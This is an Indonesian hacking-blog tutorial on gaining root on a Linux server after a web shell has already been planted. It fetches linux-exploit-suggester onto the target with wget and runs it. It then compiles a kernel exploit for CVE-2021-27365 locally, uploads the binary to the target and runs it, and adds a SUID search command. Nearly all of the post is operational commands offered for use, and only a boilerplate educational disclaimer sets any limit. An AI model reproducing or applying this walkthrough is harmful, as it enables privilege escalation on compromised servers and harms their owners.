Cara Mencari Exploit Rooting Berdasarkan Kernel & Distro Linux

Cara Mencari Exploit Rooting Berdasarkan Kernel & Distro Linux Author: Nyx6st

🔍 Cara Mencari Exploit Rooting Berdasarkan Kernel & Distro Linux

Rooting server bukan hanya soal inject shell dan akses user biasa. Tantangan terbesar dimulai saat ingin escalate ke root. Di artikel ini, kita membagikan tutorial rooting server yang akan mengunakan tool linux-exploit-suggester.sh (LES) untuk mencari exploit yang cocok.

Tools ini akan membaca informasi kernel target dan menyarankan eksploitasi yang cocok.

kita anggap udah di dalam shell dan masuk ke cmd/ketik di cmd

📌 Step-by-Step

1. Download toolnya:

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

2. Ubah permission agar bisa dijalankan:

chmod +x les.sh

3. Jalankan:

bash les.sh

📋 Contoh Output

📂 Apa yang Dilakukan LES?

  • Membaca kernel target (`uname -a`)
  • Mendeteksi distribusi Linux (RHEL, Ubuntu, CentOS, dll)
  • Mencocokkan dengan database CVE/PoC
  • Memberikan saran exploit yang memiliki peluang sukses tertinggi

⚠️ Kendala: gcc: Permission denied

Setelah LES memberikan saran exploit, biasanya langkah selanjutnya adalah compile exploit langsung di target. Tapi tidak semua server mengizinkan compile. Kami menemukan exploit CVE-2021-27365 dan sudah punya semua file .c dan .h, tapi begitu jalanin:

gcc exploit.c -o pwn

Hasil:

gcc: permission denied!

🔁 Solusi: Compile Manual di Lokal

  1. Download semua file exploit (*.c dan *.h).
  2. Compile di lokal:
    clang exploit.c leak.c common.c symbols.c send_pdu_oob.c -o exploit-root -lpthread
  3. Upload binary hasil compile (exploit-root) ke target melalui shell.
  4. Jalankan:
    chmod +x exploit-root && ./exploit-root

📎 Tips Lanjut

  • Gunakan LES versi manual jika tidak tersedia di target: bash les.sh > result.txt lalu baca secara offline.
  • Selalu cek apakah `gcc` atau `clang` tersedia untuk compile exploit.
  • Cari path SUID dengan: find / -perm -4000 -type f 2>/dev/null
  • Jika exploit butuh module (misalnya ip_tables), pastikan sudah dimuat: lsmod | grep ip_tables
  • 📘 Referensi


    ⚠️ Disclaimer

    This article is intended solely for educational purposes only. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this.


    "Where creativity, exploitation, and expression collide." — 6ickZone

    Post a Comment

    Lebih baru Lebih lama

    Mengenai Saya

    Foto saya
    6ickzone
    I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.
    Lihat profil lengkapku

    Cari Blog Ini

    About